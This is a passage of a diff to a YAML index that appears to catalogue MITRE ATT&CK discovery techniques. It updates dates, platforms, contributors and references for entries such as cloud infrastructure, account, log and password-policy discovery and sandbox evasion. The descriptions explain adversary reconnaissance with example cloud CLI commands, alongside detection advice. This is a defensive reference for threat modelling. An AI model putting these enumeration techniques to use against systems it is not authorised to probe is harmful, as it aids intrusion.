           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -50380,7 +51074,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -50410,7 +51103,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -50448,12 +51141,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50480,14 +51172,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -50516,7 +51207,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -50576,7 +51266,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -50595,7 +51285,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -50664,12 +51353,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -50746,40 +51434,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50791,6 +51450,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -50801,8 +51464,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -50812,9 +51481,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -50847,7 +51535,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50865,12 +51553,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50878,11 +51565,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50893,7 +51583,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -50907,6 +51597,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50926,56 +51620,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -50997,19 +51646,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -51080,46 +51771,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -51143,6 +51799,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -51153,9 +51812,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -51165,12 +51829,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -51213,12 +51904,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests: []
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -51229,28 +51919,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -51283,9 +51976,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
